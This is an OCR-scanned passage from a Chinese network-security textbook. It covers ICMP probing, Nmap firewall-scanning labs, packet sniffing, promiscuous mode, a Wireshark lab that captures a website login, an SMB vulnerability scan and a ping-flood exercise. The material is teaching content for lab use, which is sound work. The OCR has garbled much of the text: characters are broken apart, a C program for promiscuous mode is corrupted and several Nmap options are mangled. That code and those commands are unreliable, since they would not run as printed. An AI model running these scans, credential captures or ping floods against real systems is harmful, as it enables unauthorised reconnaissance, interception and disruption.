且 目 标 端 口 开 放 ; 防 火 墙 不 允许 ICMP 报 文通 过 。 这 种 方法 的 前 提 是 防火 墙 要 允许 ICMP 
报 文通 过 ,否则 将 收 不 到 ICMP 响应 报 文 。 

(3) ICMP 报 文 探 测 。 由 于 现在 网 络 的 安全 规则 越 来 越 严 格 , 很 多 过 滤器 或 者 防火 墙 
都 阻塞 所 有 类 型 的 ICMP 报 文 。 尽 管 如 此 ,还 是 有 部 分 防火 墙 允 许 某 些 类 型 的 ICMP 报 文 
通过 ,这 种 情况 下 ICMP 探测 是 有 效 的 。 

Q@ ICMP 回 显 请 求 ( 类 型 8, 代 码 0) 探 测 , 即 ping 探测 。 请 求 方向 目标 方 发 送 类 型 为 8 
的 ICMP 回 显 请 求 报 文 ,如 果 目 标 主机 是 活动 的 , 则 应 返回 类 型 为 0 的 ICMP 回 显 应答 报 
文 。 为 了 避免 被 探测 ,有 的 防火 墙 和 主机 丢弃 这 种 报 文 , 使 探测 者 得 不 到 回应 信息 。 如 果 将 
回 显 请 求 报 文 的 目的 IP 地 址 填写 为 目的 网 络 的 广播 地 址 ,那么 网 络 内 所 有 的 Linux 主机 将 
应 答 请 求 ,而 Windows 不 响应 。 这 样 可 判断 主机 的 操作 系统 类 型 ,得 出 网 络 内 所 有 Linux 
主机 的 拓扑 结构 。 
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@ 时 间 惟 请 求 (类 型 13 ,代码 0) 探 测 ICMP 时 间 戳 请求 报 文 的 类 型 为 13 ,主机 收 到 这 
种 报 文 后 要 回应 类 型 为 14 的 ICMP 时 间 戳 应答 报 文 。 如 果 向 广播 地 址 发 出 ICMP 时 间 截 
请 求 , 网 络 内 的 Linux 系统 会 给 予 应 答 ,而 Windows 系统 对 这 种 目的 地 址 为 广播 地 址 或 者 
网 络 地 址 的 报 文 不 予 回应 。 所 以 这 种 方法 既 可 以 用 来 探测 主机 的 连通 性 ,也 可 以 用 来 探测 
主机 的 操作 系统 类 型 。 

2) 异常 数据 包 探测 

异常 数据 包 探测 的 原理 是 向 目标 主机 发 送 一 个 不 符合 网 络 协议 规定 的 数据 包 , 诱 使 目 
标 主机 产生 一 个 差错 数据 报 ,向 源 主 机 报告 差错 ,由 此 来 判断 目标 主机 的 存活 性 。 

一 般 采 用 分 片 报 文 超时 的 方法 ,其 方法 是 : 构造 一 个 数据 报 文 ,其 IP 头 部 信息 中 的 分 
片 标志 置 位 ,然后 发 往 目标 主机 。 目 标 主机 收 到 这 个 分 片 报 文 后 将 等 待 下 一 个 分 片 报 文 ,而 
发 方 不 继续 发 送 ,直到 目标 主机 等 待 超时 ,返回 一 个 类 型 11 的 ICMP 重组 超时 错误 报 文 。 
一 旦 收 到 来 自 目标 主机 的 重组 超时 报 文 , 则 表明 目标 主机 是 存活 的 。 

由 于 很 多 过 滤器 .IDS 和 防火 墙 对 数据 包 的 合法 性 进行 验证 ,丢弃 异常 数据 包 , 因 此 这 
种 方法 受到 的 限制 较 大 。 对 于 状态 检测 防火 墙 , 其 在 收 到 分 片 报 文 时 先 将 这 个 报 文 放 人 组 
冲 区 ,等 待 后 续 报 文 的 到 来 ,如 果 超 时 , 则 直接 将 此 报 文 丢弃 ,不 作 任何 回应 。 因 此 ,该 探测 
方法 对 于 状态 检测 防火 墙 是 不 适用 的 。 

实验 2-5 防火墙 扫描 实验 


【实验 目的 】 
通过 Nmap 强 有 力 的 防火 墙 扫描 命令 ,判断 防火 墙 的 存在 性 。 
【实验 原理 】 


Nmap 对 防火 墙 的 探测 包括 发 送 ACK 包 、.SYN 包 、TCP 包 等 手段 ,根据 回应 包 分 析 防 
火 墙 的 情况 ,防火墙 有 4 种 类 型 的 响应 : 

(1) Open port( 防 火 墙 允许 少数 端口 打开 ) 。 

(2) Closed Port( 由 于 防火 墙 的 缘故 ,大 部 分 的 端口 被 关闭 ) 。 

(3) FilteredCNmap 不 确定 端口 是 否 打开 或 者 关闭 ) 。 

(4) Unfiltered(Nmap 能 够 访问 这 个 端口 ,但 是 不 清楚 这 个 端口 打开 的 状态 ) 。 

根据 不 同 的 回应 信息 ,可 给 出 大 致 的 判断 。 

【实验 环境 】 

操作 系统 : Windows 7。 

IP 地 址 : 扫描 机 IP 为 192. 168. 1. 10, 目标 机 为 192. 168. 1. 20( 按 实际 情况 更 改 ) 。 

防火 墙 : Windows 7 自 带 防火 墙 。 

【实验 过 程 】 

实验 一 、TCP ACK Scan (-sA) 

(1) 关闭 目标 机 防火 墙 ,命令 为 netsh firewall set opmode 一 disable。 

(2) 在 扫描 机 上 执行 nmap -sA 192. 168. 1. 20, 记 录 扫 描 结果 (探测 该 主机 是 否 使 用 了 
包 过 滤器 或 防火 墙 ) 。 

(3) 开启 目标 机 防火 墙 命令 为 netsh firewall reset 。 

(4) 在 扫描 机 上 执行 nmap -sA 192. 168. 1. 20 ,记录 扫 描 结 果 。 

(5) 将 前 后 两 次 扫描 结果 填 人 表 2-18 。 
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表 2-18 ”ACK 扫描 结果 


关闭 目标 机 防火 墙 后 开启 目标 机 防火 墙 后 


(6) 用 Wireshark 抓 取 数 据 包 ,分 析 Nmap 发 出 了 什么 探测 包 ? 得 到 什么 回复 包 ? 
(7) 分 析 扫 描 结果 ,得 出 结论 : 可 以 很 容易 地 发 现 目标 机 是 否 启用 了 防火 墙 ,因为 一 个 


简单 的 ACK 扫描 意味 着 攻击 者 只 有 较 低 的 几率 检测 到 受害 机 ,但 是 有 较 高 的 几率 发 现 防 
火 墙 。 


实验 二 、SYN 扫描 (-sS) 

(1) 关闭 目标 机 防火 墙 ,命令 为 netsh firewall set opmode 一 disable。 
(2) 在 扫描 机 上 执行 nmap -sS 192. 168. 1. 20 ,记录 扫描 结果 。 

(3) 开启 目标 机 防火 墙 命令 为 netsh firewall reset 。 

(4) 在 扫描 机 上 执行 nmap -sS 192. 168. 1. 20 ,记录 扫描 结果 。 

(5) 将 前 后 两 次 扫描 结果 填 人 表 2-19 。 


表 2-19 ”SYN 扫描 结果 


关闭 目标 机 防火 墙 开启 目标 机 防火 墙 


(6) 用 Wireshark 抓 取 数据 包 , 分 析 Nmap 发 出 了 什么 探测 包 ? 得 到 什么 回复 包 ? 
(7) 分 析 扫 描 结果 ,得 出 结论 。 

实验 三 、TCP Window 扫描 (-sW) 

(1) 关闭 目标 机 防火 墙 ,命令 为 netsh firewall set opmode 二 disable。 

(2) 在 扫描 机 上 执行 nmap -sW 192. 168. 1. 20 ,记录 扫描 结果 。 

(3) 开启 目标 机 防火 墙 ,命令 为 netsh firewall reset 。 

(4) 在 扫描 机 上 执行 nmap -sW 192. 168. 1. 20 ,记录 扫描 结果 。 

(5) 将 前 后 两 次 扫描 结果 填 人 表 2-20。 


表 2-20 TCP 扫描 结果 


关闭 目标 机 防火 墙 开启 目标 机 防火 墙 
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(6) 用 Wireshark 抓 取 数 据 包 ,分析 Nmap 发 出 了 什么 探测 包 ? 得 到 什么 回复 包 ? 

(7) 分 析 扫 描 结果 ,得 出 结论 : TCP Window 扫描 与 ACK 扫描 非常 相似 ,但 是 有 一 点 
不 同 ,TCP Window 扫描 可 以 区 分 未 被 过 滤 端 口 的 打开 或 者 关闭 。 

实验 四 、 根据 实验 一 至 实验 三 的 扫描 特点 ,对 3 种 扫描 方式 如 何 发 现 防火 墙 进行 综合 
分 析 。 


2.2 网 络 嗅 控 


网 络 嗅 探 是 指 利 用 计算 机 的 网 络 接口 截获 其 他 计算 机 的 数据 报 文 的 一 种 手段 ,一 般 通 
过 “网 卡 十 协议 分 析 仪 形式。 这 种 形式 开发 的 抓 包 软件 常 称 为 “网 络 嗅 探 器 ”"。 通 过 嗅 探 器 
可 以 随时 掌握 网 络 的 实际 情况 ,查找 网 络 漏洞 和 检测 网 络 性 能 ,可 以 很 方便 地 对 网 络 进行 诊 
断 。 例 如 ,可 以 通过 嗅 探 器 分 析 网 络 流量 ,查找 网 络 阻塞 的 来 源 。 在 网 络 编程 时 嗅 探 器 可 作 
为 抓 包 测试 的 工具 ,因为 网 络 程序 都 是 以 数据 包 的 形式 在 网 络 中 进行 传输 的 。 

网 络 嗅 探 的 基础 是 数据 捕获 , 嗅 探 软件 是 在 网 络 中 实现 对 于 数据 的 捕获 的 。 嗅 探 得 到 
的 信息 是 随机 的 二 进 制 数据 ,捕获 后 的 数据 由 网 络 嗅 探 程 序 通过 协议 分 析 的 方法 进行 解码 
并 使 其 以 易于 阅读 的 形式 呈现 。 与 主动 扫描 相 比 , 嗅 探 行为 更 难 被 察觉 。 


2.2.1 网 络 嗅 探 基本 原理 


网 络 嗅 探 器 利用 的 是 共享 式 的 网 络 传输 介质 。 共 享 即 意味 着 网 络 中 的 一 台 PC 可 以 嗅 
探 到 传递 给 本 网 段 (冲突 域 ) 中 的 所 有 PC 的 报 文 。 最 常见 的 以 太 网 就 是 一 种 共享 式 的 网 络 
技术 。 以 太 网 卡 收 到 报 文 后 ,通过 对 目的 地 址 进行 检查 来 判断 是 否 是 传递 给 自己 的 ,如 果 
是 , 则 把 报 文 传递 给 操作 系统 ;否则 ,将 报 文 丢弃 ,不 进行 处 理 。 网 卡 存在 一 种 特殊 的 工作 模 
式 , 在 这 种 工作 模式 下 ,网 卡 不 对 目的 地 址 进行 判断 ,而 直接 将 其 收 到 的 所 有 报 文 都 传递 给 
操作 系统 进行 处 理 , 这 种 特殊 的 工作 模式 就 称 为 混杂 模式 。 网 络 嗅 探 器 通过 将 网 卡 设置 为 
混杂 模式 来 实现 对 网 络 的 嗅 探 ,这 种 设置 是 通过 软件 方式 实现 的 。 

在 主机 系统 中 ,数据 的 收发 都 是 由 网 卡 来 完成 的 。 当 网 卡 接收 到 传输 来 的 数据 包 时 ,网 
卡 程序 首先 解析 数据 包 的 目的 网 卡 物理 地 址 ,然后 根据 网 卡 驱 动 程序 设置 的 接收 模式 判断 
该 不 该 接收 ,认为 该 接收 就 产生 中 断 信 号 通知 CPU ,认为 不 该 接收 就 丢掉 数据 包 。 如 果 数 
据 包 被 网 卡 抛 弃 了 ,上 层 应 用 也 就 得 不 到 该 数据 包 。CPU 如 果 得 到 网 卡 的 中 断 信号 , 则 根 
据 网 卡 的 驱动 程序 设置 的 网 卡 中 断 程 序 地 址 调用 驱动 程序 接收 数据 ,并 将 接收 的 数据 交 给 
上 层 协 议 软 件 处理 , 逆 向 解析 还 原 帧 的 内 容 , 从 而 完成 对 网 络 的 嗅 探 。 

网 络 嗅 探 器 主要 由 包 捕 获 器 和 包 分 析 器 两 个 部 分 组 成 ,结构 如 图 2-13 所 示 。 

包 捕 获 器 用 于 接收 每 一 个 网 络 上 (发 送 /接收 /经 过 ) 的 链 路 层 帧 ,并 复制 至 内 部 缓冲 区 。 
而 包 分 析 器 用 于 显示 协议 消息 中 的 所 有 字段 的 内 容 。 

嗅 探 器 如 果 部 署 在 被 攻击 机 器 附近 或 网 关 甚 至 在 路 由 器 上 (或 有 路 由 器 功能 的 主机 
上 ) ,可 以 对 大 量 的 数据 进行 监控 。 如 果 数 据 包 没有 被 加 密 传输 ,那么 这 些 明 文 数 据 包 如 被 
嗅 探 器 捕获 ,后 果 将 不 堪 设 想 。 尤 其 像 FTP、Telnet、SNMP、POP 等 协议 ,其 密码 是 以 明文 
形式 传输 的 ,几乎 没有 安全 性 可 言 。 
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图 2-13 网 络 嗅 探 器 的 结构 


2.2.2 嗅 探 器 检测 与 防范 


由 于 嗅 探 器 是 被 动 的 程序 ,并 不 会 留 下 让 别人 审核 的 痕迹 ,因而 非常 难以 被 发 现 。 由 于 
嗅 探 器 必须 将 网 卡 设 为 混杂 模式 才能 正常 工作 ,而 一 般 正 常服 务 的 网 卡 都 不 处 在 该 模式 下 ， 
因此 检测 嗅 探 器 就 等 同 于 检测 网 络 内 是 否 存在 网 卡 设 为 混杂 模式 的 计算 机 。 一 般 采 用 下 列 
检测 与 防范 手段 : 

(1) 异常 情况 观察 。 例 如 利用 arp 方式 进行 监测 。 这 种 模式 向 局 域 网 内 的 主机 发 送 非 
广播 方式 的 arp 包 , 如 果 局 域 网 内 的 某 个 主机 响应 了 这 个 arp 请 求 , 那 么 就 可 以 判断 出 它 很 
可 能 处 于 网 络 监听 模式 ,这 是 目前 相对 而 言 比 较 好 的 监测 模式 ,其 实例 见 本 章 习题 第 14 题 。 

(2) 规划 安全 的 网 络 拓扑 结构 。 网 络 分 段 越 细 , 嗅 探 器 能 够 收集 的 信息 就 越 少 。 可 以 
将 网 络 分 成 一 些小 的 网 络 ,每 一 个 网 段 连接 到 一 个 交换 器 上 。 还 可 以 划分 VLAN ,使 得 网 
络 隔离 不 必要 的 数据 传送 。 

(3) 采用 数据 加 密 技 术 。 主 要 采用 的 是 将 目前 被 证 实 的 较为 可 靠 的 加 密 机 制 对 互联 网 
上 传输 的 邮件 和 文件 进行 加 密 。 


2.2.3 Wireshark 嗅 探 器 


Wireshark 是 著名 的 一 款 网 络 协 议 分析 器 , 它 能 捕获 和 实时 地 浏览 经 过 网 卡 的 数据 。 
Wireshark 是 一 款 开源 的 工具 ,是 一 款 多 平台 、 开 源 网 络 协议 分 析 器 ,支持 Windows、Linux、 
OS X、Solaris、FreeBSD、NetBSD 等 操作 系统 。Wireshark 可 以 实时 检测 和 抓 取 网 络 数据 
包 , 可 以 通过 图 形 用 户 界面 (GUI) 浏 览 这些 数据 ,还 可 以 查看 网 络 数据 包 中 每 一 层 的 详细 内 
容 。Wireshark 支持 上 百 种 协议 和 媒体 类 型 。 

关于 Wireshark 的 用 法 ,第 1 章 有 详细 的 介绍 。 

实验 2-6 网络 监 听 实 验 

【实验 目的 】 

(1) 了 解 网 络 监听 器 原理 。 

(2) 了 解 如 何 查看 、 更 改 网 卡 工作 模式 。 
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(3) 讨论 如 何 设计 一 个 网 络 监听 器 。 

【实验 原理 】 

在 以 太 网 中 ,通信 都 是 广播 模式 的 。 通 常 在 同一 个 网 段 的 所 有 网 络 接口 都 可 以 访问 在 
物理 介质 上 传输 的 所 有 数据 ,每 一 个 网 络 接口 都 有 一 个 唯一 的 硬件 地 址 ,这 个 硬件 地 址 就 是 
网 卡 的 MAC 地 址 。 大 多 数 系统 使 用 48 位 的 地 址 ,该 地 址 用 来 表示 网 络 中 的 每 一 个 设备 。 
每 一 块 网 卡 上 的 MAC 地 址 都 是 不 同 的 ,在 硬件 地 址 和 IP 地 址 间 使 用 ARP 和 RARP 协议 
进行 相互 转换 。 

在 正常 的 情况 下 ,一 个 网 络 接口 应 该 只 响应 如 下 两 种 数据 帧 ; 

(1) 与 自己 硬件 地 址 相 匹配 的 数据 帧 。 

(2) 发 向 所 有 机 器 的 广播 数据 帧 。 

在 PC 中 ,数据 的 收发 是 由 网 卡 来 完成 的 。 网 卡 在 接收 到 传输 数据 后 ,网 卡 内 的 程序 接 
收 数据 帧 的 目的 MAC 地 址 ,根据 网 卡 驱 动 程序 设置 的 接收 模式 判断 该 不 该 接收 ,如 果 应 该 
接收 就 在 接收 后 产生 中 断 信号 通知 CPU ,如 果 不 该 接收 就 丢掉 不 管 。 所 以 不 该 接收 的 数据 
网 卡 就 截断 了 ,计算 机 操作 系统 并 不 知道 。CPU 得 到 中 断 信号 产生 中 断 ,操作 系统 就 根据 
网 卡 的 驱动 程序 设置 的 网 卡 中 断 程序 地 址 调用 驱动 程序 接收 数据 ,驱动 程序 接收 数据 后 放 
入 信号 堆栈 让 操作 系统 处 理 。 

网 卡 一 般 有 4 种 接收 模式 : 

(1) 广播 方式 : 能 够 接收 网 络 中 的 广播 信息 。 

(2) 多 播 方式 : 能 够 接收 多 播 数据 。 

(3) 直接 方式 : 只 有 目的 网 卡 才能 接收 该 数据 。 

(4) 混杂 模式 : 能 够 接收 一 切 通过 它 的 数据 ,而 不 管 该 数据 是 否 是 传 给 它 的 。 

显然 ,如 果 网 卡 设置 为 混杂 模式 ., 便 能 够 接收 到 一 切 通过 它 的 数据 ,这 实际 上 就 是 网 络 
监听 基本 原理 : 让 网 卡 接收 一 切 所 能 接收 的 数据 。 

【实验 内 容 】 

(1) 简要 分 析 协 议 分 析 软 件 Wireshark 的 工作 原理 。 

(2) 在 Linux 下 如 何 查看 网 卡 处 于 什么 工作 模式 ? 

(3) 下 列 程序 makprom. c 将 设置 网 卡 工作 模式 为 混杂 模式 ,请 调试 、 测 试 该 程序 。 


#include <cstdio.h> 
#include < sys/ioct1.h> 
#include <cstdlib.h> 
#include < sys/socket .h> 
#include <cstring.h> 
#include <1linux/in.h> 
#include <linux/if ether.h> 
#include <unistd.h> 
#include <net/if.h> 
int main (int argc, char **argv) { 
int sock, n; 
struct ifreq ethreq; 
if((sock= socket (PF_PACKET, SOCK RAW, htons(ETH P AIT)))<0) { 
。88 。 


Perror ("socket"); 
exit (1); 
} 
/* 将 网 卡 设置 为 混杂 模式 * / 
strncpy (ethreq.ifr name, "ethO", IFNAMSI2); // 把 网 络 设备 的 名 字 填 充 到 ifr 结构 中 
if(ioct1(sock, SIOCGIFFLAGS, gethreq)==-1) { // 获 取 接 口 标志 
perror ("ioctl1"); 
Close(sock) 
exit(1); 
} 
ethreq.ifr flags |=IFF PROMISC; // 获 取 接 口 标志 后 将 其 设置 成 混杂 模式 
if(ioct]l(sock, SIOCSIFFLAGS, &ethreq)==-1) { 
perror ("ioct1"); 
close (sock); 
exit (1)7 
} 
Printf ("Success to set eth0 to promiscuos mode...\n"); 
return 0; 


} 


QO@ 编译 命令 : gcc makprom. c -o makprom 。 

@ 查看 当前 网 卡 的 工作 模式 : ifconfig。 

@ 执行 命令 : sudo . /makprom, 网 卡 的 工作 模式 是 否 发 生 改变 ? 

@ Linux 有 无 提供 设置 网 卡 工作 为 混杂 模式 的 命令 ? 

(4) 如 果 要 自 编 捕获 数据 包 的 程序 , 写 出 思路 。 

(5) 数据 包 捕 获 后 ,如 何 像 Wireshark 那样 解读 包 的 内 容 ? 

【实验 讨论 】 

有 没有 切实 可 行 的 方法 可 以 防止 被 监听 ? 

实验 2-7 网络 嗅 探 器 使 用 和 分 析 

【实验 目的 】 

(1) 熟悉 网 络 数据 包 捕 获 工 具 的 使 用 。 

(2) 熟悉 扫描 程序 (漏洞 .端口 ) 的 使 用 。 

(3) 能 够 利用 嗅 探 器 分 析 扫 描 程序 的 具体 原理 。 

【实验 准备 】 

(1) 下 载 相关 工具 和 软件 包 (Wireshark ,Nmap) 。 

(2) 在 计算 机 中 安装 相应 的 软件 。 

【实验 内 容 】 

(1) 利用 WireShark 捕获 数据 包 查 找 用 户 名 和 密码 。 

在 VOA 网 站 (http://www. unsv. com/) 上 注册 一 个 会 员 号 ,利用 Wireshark 捕获 数据 
包 , 对 捕获 到 的 数据 包 进 行 分 析 , 查 找 用 户 名 和 密码 。 

@ 打开 VOA 网 站 ,进入 会 员 登 录 界 面 。 

@ 输入 相应 的 用 户 名 和 密码 。 
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@ 启动 Wireshark 应 用 程序 ,进入 数据 包 捕 获 状 态 ,将 Capture Filter 设置 为 tcp port 
http。 
@ 在 捕获 的 包 中 查找 相应 的 用 户 名 和 密码 。 
捕获 的 用 户 名 为 
捕获 的 密码 为 
(2) 监控 和 分 析 Nmap 对 局 域 网 中 的 主机 的 扫描 行为 。 
〇 下 载 并 安装 Nmap ,在 命令 窗口 下 ,进入 安装 Nmap 的 文件 夹 下 ,然后 输入 


nmap - SP 192.168.136.1- 254 


探测 局 域 网 中 开放 的 主机 。 

@ Wireshark 捕获 Nmap 主机 扫描 的 探测 包 , 并 对 扫描 机 制 进行 分 析 。 

【实验 思考 】 

(1) 采用 类 似 Wireshark 捕获 目标 主机 用 户 名 和 密码 的 方法 ,尝试 捕获 目标 主机 的 网 
易 邮 箱 ,看 是 否 可 以 捕获 到 邮箱 的 用 户 名 和 密码 。 如 果 不 能 ,说 明 原因 。 

(2) 在 使 用 Nmap 扫描 目标 主机 后 ,可 以 获知 目标 主机 的 许多 有 用 信息 ,目标 主机 如 何 
利用 这 些 信息 做 好 安全 防御 ? 


习 题 2 


1. 阅读 以 下 协议 文档 ,了 解 协议 的 详细 信息 。 

(1) TCP( 传 输 控制 协议 )RFC793。 

(2) UDP( 用 户 数据 报 协议 )RFC768 。 

(3) ICMP( 控 制 报 文 协议 )RFC792。 

2. 判断 题 

(1) 基于 主机 的 漏洞 扫描 不 需要 有 主机 的 管理 员 权限 。 

(2) 半 连 接 扫描 也 需要 完成 TCP 协议 的 3 次 握手 过 程 。 

(3) 使 用 漏洞 库 匹 配 的 方法 进行 扫描 ,可 以 发 现 所 有 的 漏洞 。 
(4) 所 有 的 漏洞 都 是 可 以 通过 打 补丁 来 弥补 的 。 

(5) 通过 网 络 扫描 ,可 以 判断 目标 主机 的 操作 系统 类 型 。 
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3. 选择 题 
(1) 使 用 漏洞 库 匹 配 的 扫描 方法 ,能 发 现 ( 站 
A. 未 知 的 漏洞 B. 已 知 的 漏洞 
C. 自行 设计 的 软件 中 的 漏洞 D. 所 有 漏洞 
(2) ) 不 可 能 存在 于 基于 网 络 的 漏洞 扫描 器 中 。 
A. 漏洞 数据 库 模 块 B. 扫描 引擎 模块 
C. 当前 活动 的 扫描 知识 库 模 块 D. 阻 断 规则 设置 模块 


(3) 主机 型 漏洞 扫描 器 可 能 具备 的 功能 有 ( )。 
A. 重要 资料 锁定 : 利用 安全 的 校 验 和 机 制 来 监控 重要 的 主机 资料 或 程序 的 完 
整 性 
。 90 。 


B. 弱 口 令 检查 : 采用 结合 系统 信息 .字典 和 词汇 组 合 等 的 规则 来 检查 弱 口 令 
. 系统 日 志和 文本 文件 分 析 : 针对 系统 日 志 档 案 , 如 UNIX 的 syslogs 及 
Windows NT 的 事件 日 志 (Event Log), 以 及 其 他 文本 文件 的 内 容 做 分 析 
D. 动态 报警 : 当 遇 到 违反 扫描 策略 或 发 现 已 知 安 全 漏洞 时 ,提供 及 时 的 告警 。 告 
警 可 以 采取 多 种 方式 ,可 以 是 声音 .弹出 窗口 .电子 邮件 甚至 手机 短信 等 
E. 分 析 报 告 : 产生 分 析 报 告 ,并 告诉 管理 员 如 何 弥 补漏 洞 

(4) 下 面 不 是 网 络 端口 扫描 技术 的 是 ( 

A. 全 连接 扫描 B. 半 连 接 扫描 C. 插件 扫描 D. 特征 匹配 扫描 
E. 源码 扫描 

(5) 安全 评估 技术 采用 ( ) 这 一 工具 , 它 是 一 种 能 够 自动 检测 远程 或 本 地 主机 和 网 
络 安全 性 弱点 的 程序 。 

A. 安全 扫描 器 B. 安全 扫描 仪 C. 自动 扫描 器 D. 自动 扫描 仪 

(6) 安全 扫描 可 以 ( Ba 

A. 弥补 由 于 认证 机 制 薄弱 带 来 的 问题 

B. 弥补 由 于 协议 本 身 而 产生 的 问题 

C. 弥补 防火 墙 对 内 网 安全 威胁 检测 不 足 的 问题 
D. 扫描 检测 所 有 的 数据 包 攻 击 ,分析 所 有 的 数据 流 

4. 熟悉 Windows 命令 行 for 命令 的 使 用 ,构造 批 处 理 文件 (bat 文件 ) ,实现 ping 对 主 
机 的 批量 扫描 。 可 以 扫描 本 地 局 域 网 主机 ,也 可 以 扫描 其 他 网 络 主机 。 扫 描 范 围 可 以 是 整 
段 (255 个 连续 IP) 扫 描 , 也 可 以 是 局 部 扫描 。 并 可 将 扫描 结果 存储 在 文件 中 。 

要 求 在 命令 提示 窗口 下 执行 ,有 简要 的 操作 提示 , 批 处 理 文件 要 求 说 明 思路 ,重要 语句 
要 有 注释 ,并 贴 有 实验 截图 。 

5. 编写 简单 的 C 程序 文件 ,在 程序 中 调用 操作 系统 ping 命令 ,实现 ping 对 主机 的 批量 
扫描 。 可 以 扫描 本 地 局 域 网 主机 ,也 可 以 扫描 其 他 网 络 主机 。 扫 描 范 围 可 以 是 整 段 (255 个 
连续 IP) 扫 描 , 也 可 以 是 局 部 扫描 。 并 可 将 扫描 结果 存储 在 文件 中 。 

要 求 在 命令 提示 窗口 下 执行 ,有 简要 的 操作 提示 ,要 求 说 明 思路 ,重要 语句 要 有 注释 ,并 
贴 有 实验 截图 。 

6. 使 用 Nmap 扫描 实验 。 假 设 目 标 机 172. 16. 1.101, 按 以 下 要 求 分 析 目 标 机 环境 的 配 
置 情 况 , 撰 写实 验 分 析 报 告 。 

下 面 的 (1) 一 (6) 实 验 , 要 求 每 次 均 使 用 Wireshark 抓 包 ,从 捕获 的 数据 包 中 分 析 探 测 
包 、 回 复 包 。 

(1) 主机 发 现 : 进行 连通 性 监测 ,判断 目标 机 是 否 可 连通 ,运行 如 下 命令 : 

Nmap - sP 172.16.1.101 

将 扫描 检测 结果 截图 贴 入 实验 报告 ,包括 目标 主机 是 否 存 活 , 如 果 存 活 ,请 记录 该 主机 
的 MAC 地址 及 其 网 卡 的 厂商 品牌 等 信息 。 

(2) 对 目标 主机 进行 UDP 端口 扫描 ,运行 如 下 命令 : 


A 


Nmap- sU 172.16.1.101 


将 扫描 检测 结果 截图 贴 和 实验 报告 ,包括 所 有 的 端口 及 开放 情况 。 
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(3) 探测 目标 主机 开放 端口 上 所 提供 的 服务 及 其 类 型 和 版 本 信息 ,运行 如 下 命令 : 
Nmap - sV 172.16.1.101 


请 将 扫描 检测 结果 截图 贴 和 实验 报告 ,包括 所 有 的 端口 及 其 服务 版 本 信息 。 
(4) 探测 目标 主机 的 系统 类 型 及 开放 端口 ,运行 如 下 命令 : 


nmap - SS -P0 -sV-O 172.16.1.101 


其 中 : 

-SS TCP SYN 扫描 (又 称 半 开 放 或 隐身 扫描 )。 
-PO 允许 关闭 ICMP ping。 

-sV 打开 系统 版 本 检测 。 

-O 尝试 识别 远程 操作 系统 。 


请 将 扫描 检测 结果 贴 人 实验 报告 ,包括 探测 出 来 的 目标 主机 操作 系统 类 型 信息 。 
(5) 寻找 所 有 在 线 主机 : 


nmap - SP 172.16.0. 关 
或 者 
nmap - SP 172.16.0.0/24 


请 将 扫描 检测 结果 截图 贴 入 实验 报告 ,包括 目标 主机 的 开放 端口 、 服 务 版 本 、 操 作 系 统 
类 型 信息 等 。 
(6) 在 某 段 子 网 上 查找 未 占用 的 IP: 


nmap - T4 -SP 192.168.2.0/24 && egrep "00:00:00:00:00:00" /proc/net/arp 


7. Nmap Scripting 是 Nmap 最 好 的 功能 之 一 ,其 引擎 已 经 超过 了 400 个 脚本 ,并 且 用 
户 可 以 自行 构造 脚本 。smb-check-vulns 是 一 个 用 于 检测 以 下 漏洞 的 重要 脚本 ， 

。 MS08-067 Windows vulnerability that can be exploited 

。 Conficker malware on the target machine 

。 Denial of service vulnerability of Windows 2000 

。 MS06-025 Windows vulnerability 

。 MS07-029 Windows vulnerability 

实验 要 求 : 

扫描 192. 168. 1. 20 的 Windows 7 主机 ,在 关闭 防火 墙 /开启 防火 墙 两 种 情况 下 执行 扫 
描 命令 : 


nmap -一 Script smb- check- vulns ~p445 192.168.1.20 


(1) 比较 在 关闭 和 开启 防火 墙 两 种 情况 下 的 扫描 结果 ,说 明 开 启 防 火 墙 的 重要 性 。 
(2) 扫描 结果 显示 有 什么 漏洞 ? 
8. 使 用 Nessus 扫描 某 台 目标 机 ,并 给 出 目标 机 环境 上 的 网 络 服务 及 安全 漏洞 情况 , 摆 
写实 验 分 析 报告 。 报 告 中 应 包含 如 下 内 容 : 
(1) 漏洞 的 数量 统计 信息 。 
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(2) 所 有 的 High 级 别 漏洞 的 详细 信息 。 

(3) 所 有 Medium 级 别 漏洞 的 详细 信息 。 

(4) Low 级 别 漏洞 信息 的 简要 统计 分 析 。 

9. 如 何 监视 具体 网 段 是 否 存在 恶意 行为 的 端口 扫描 ? 

10. 漏洞 扫描 系统 的 实现 依赖 的 技术 是 什么 ? 

11. 漏洞 扫描 技术 的 发 展 趋势 是 什么 ? 

12. 在 防火 墙 类 型 探测 中 涉及 防火 墙 特征 信息 的 采集 ,处理 ,这 需要 通过 各 种 途径 采集 
尽 可 能 多 的 防火 墙 特征 信息 ,从 而 可 以 准确 .真实 地 探测 出 防火 墙 的 类 型 。 请 手动 搜集 当前 
流行 的 防火 墙 的 特征 信息 ,以 形成 防火 墙 特征 信息 库 。 

13. Wireshark、tcpdump、WinDump、Sniffit、ettercap 都 是 网 络 包 监听 分 析 工 具 , 试 比 
较 它 们 的 特点 。 

14. 在 图 2-14 中 ,主机 A 是 Windows 平台 ,主机 B.C.D 是 Linux 平 台 。 实 验 时 ,假设 
主机 A 与 其 他 主机 没有 通信 。 

(1) 查看 主机 B、C、D 网 卡 的 工作 模式 ,如 有 处 于 混杂 模式 的 ,将 其 取消 混杂 模式 
(ifconfig eth0 -promisc) 。 

(2) 在 主机 A 的 命令 行 窗口 ,用 命令 arp -d 删除 ARP 表 。 

(3) 在 主机 A 上 ping 192. 168.1.1。 

(4) 查看 arp -a 表 , 分 析 表 中 数据 。 

(5) 将 主机 D 的 网 卡 工作 模式 设 为 混杂 模式 (ifconfig eth0 promisc) ,重复 (2) 一 (4) 步 ， 
能 得 出 什么 结论 ? 


A 
丽 
< 


192.168.1.10/24 


192.168.1.16/24 
图 2-14 14 题 实验 拓扑 


15. 使 用 Wireshark 监控 流量 。 

ping 曾 被 作为 一 款 黑 客 工 具 。 时 过 境 迁 ,目前 它 已 经 失去 了 当日 的 威风 。 本 实验 重 温 
ping 攻击 ,以 表明 操作 系统 已 经 作 了 防范 。 

实验 内 容 : 

(1) 利用 实验 室 PC 数量 较 多 的 环境 ,在 局 域 网 内 选取 一 台 PC( 假 设 其 IP 为 192. 168. 
1.100) ,测试 “死亡 之 ping”。 

(2) 在 被 测 机 和 参与 测试 的 PC 上 启动 Wireshark ,并 打开 资源 监视 器 。 

(3) 观察 和 记录 图 2-15 ,以 便 实验 比较 。 

(4) 参与 测试 的 PC 同时 ping 测试 机 : 

。 93 。 


Ping 192.168.1.100 -t -1 65500 


(5) 观察 图 2-15( 请 贴 上 实验 时 的 具体 截图 ) ,发 现 Wireshark 监控 到 的 ping 包 数 据 流 
